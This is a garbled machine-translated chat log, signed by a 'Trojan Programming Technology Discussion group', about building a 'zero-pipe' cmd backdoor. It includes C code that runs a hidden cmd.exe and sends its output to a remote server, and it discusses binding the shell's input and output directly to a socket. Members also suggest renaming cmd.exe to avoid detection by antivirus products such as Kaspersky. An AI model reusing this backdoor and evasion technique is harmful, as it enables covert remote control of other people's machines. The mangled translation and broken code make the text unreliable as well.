Technical Discussion about zero-pipe cmd Backdoor

Cold wind
Let's take a closer look at the zero pipeline ........

. μ P 2 breeze
This is not just Kabbah, but basically all active defenses !!
Packet port SSM, micropoints ,,,

Xicao
Hot Patching

. μ P 2 breeze
Yes ..

Cold wind
Replace the input and output handle directly with a socket to implement zero Pipe

Sulwan
Revolutionizing core programming

. μ P 2 breeze
I use a zero-pipe network ..

Phantom
Si. hstdinput = hrp1;
Si. hstdoutput = hwp2;

Phantom
Yesgehandle

. μ P 2 breeze
Haha, I have a little bit of information, but I cannot understand it !!

Phantom
Is socket an integer?

Xicao
Anti-DDoS Pro has been introduced in articles

Xicao
Socket is unsigned long

Phantom
Yes
You mean
Si. hstdinput = sock1;
Si. hstdoutput = sock1;

Sulwan
Integer

Lenk
Pipeline communication?

Sulwan
Yes

Sulwan
Socket socket (
Int AF,
Int type,
Int Protocol
);
Can this be understood?

Cold wind
Haha understand ....

. μ P 2 breeze

Int c0000line: dosshell (char * command)
{
Startupinfo Si;
Process_information PI;
Handle hread = NULL, hwrite = NULL;

Tchar character line [300] = {0}; // Command Line Buffer
Byte sendbuf [2048] = {0}; // sending Buffer
Security_attributes SA; // Security Descriptor
DWORD bytesread = 0;
STD: String strbuffer;

SA. nlength = sizeof (security_attributes );
SA. lpsecuritydescriptor = NULL;
SA. binherithandle = true;

// Create an anonymous Pipeline
If (! Createpipe (& hread, & hwrite, & SA, 0 ))
Goto clean; // failed

Si. cb = sizeof (startupinfo );
Getstartupinfo (& Si );
Si. hstderror = hwrite;
Si. hstdoutput = hwrite; // process (CMD) Output write Pipeline
Si. wshowwindow = sw_hide;
Si. dwflags = startf_useshowwindow | startf_usestdhandles;

Getsystemdirectory (cmdline, sizeof (cmdline); // obtain the system directory
Strcat (cmdline, "// cmd.exe/C"); // concatenate cmd
Strcat (cmdline, command); // concatenate a complete cmd command
// Create a process, that is, execute the CMD command
If (! CreateProcess (null, cmdline, null, null, true, null, & Si, & PI ))
Goto clean; // failed
Closehandle (hwrite );

While (true)
{
// Read the data in the pipeline in an infinite loop until there is no data in the pipeline
If (readfile (hread, sendbuf, sizeof (sendbuf), & bytesread, null) = 0)
Break;
M_hserver-> send (sendbuf, bytesread );
Memset (sendbuf, 0, sizeof (sendbuf); // cache cleared
Sleep (100); // take a break
}
Clean:
If (hread! = NULL)
Closehandle (hread );

If (hwrite! = NULL)
Closehandle (hwrite );

Return true;
}
Phantom
What does this code mean?

Phantom
Zero pipe?

. μ P 2 breeze
Zero MPs queue !!

Xicao
Is to forcibly convert the socket to the handle type

Phantom
Isn't it?

. μ P 2 breeze
What is Xi Cao talking about ??

Xicao
I'm just saying that there is no pipe.

. μ P 2 breeze
Haha, you have tested it yourself, but kaback ..

Xicao
After the installation, you can set beibei.exeto abc.exe.

Phantom
(Hwrite); it's useless.

Sulwan
Is your memory consumption high?

Xicao
Startupinfo. hstdinput = (handle) sclient;

Phantom
You can use beibei.exeas abc.exe. -- it seems useless. I am still prompted to use it like this.

. μ P 2 breeze

It's not my understanding that there is no MPs queue ..
Only create a pipe, and kaback monitoring creates two pipe codes ,,
It's not about socket !!! You copy cmd to monitor it like other names ..

Xicao
No MPs queue is required.

Lenk
Come back later. Friends, discuss it slowly

. μ P 2 breeze
His process is to create cmd, and then execute the command to read the data in the pipeline, and close the pipeline !! Send read data!

. μ P 2 breeze
Dizzy, do you think I have understood it wrong ??

Sulwan
Khan! I cannot think of my mind! Long knowledge

Xicao
Createpipe is no longer used for zero-MPs queues.
Directly use socket to take over the input and output handle

. μ P 2 breeze
Okay, I'll go back and look at the materials... and there's no need to argue. It's just a good horse to pass Kabbah... haha !!
Blackfeather
Hurry to learn ···

After finishing the post, you can understand the channel as a phantom.
Si. hstdinput = sock1;
Si. hstdoutput = sock1;

By Trojan Programming Technology Discussion group (44390702)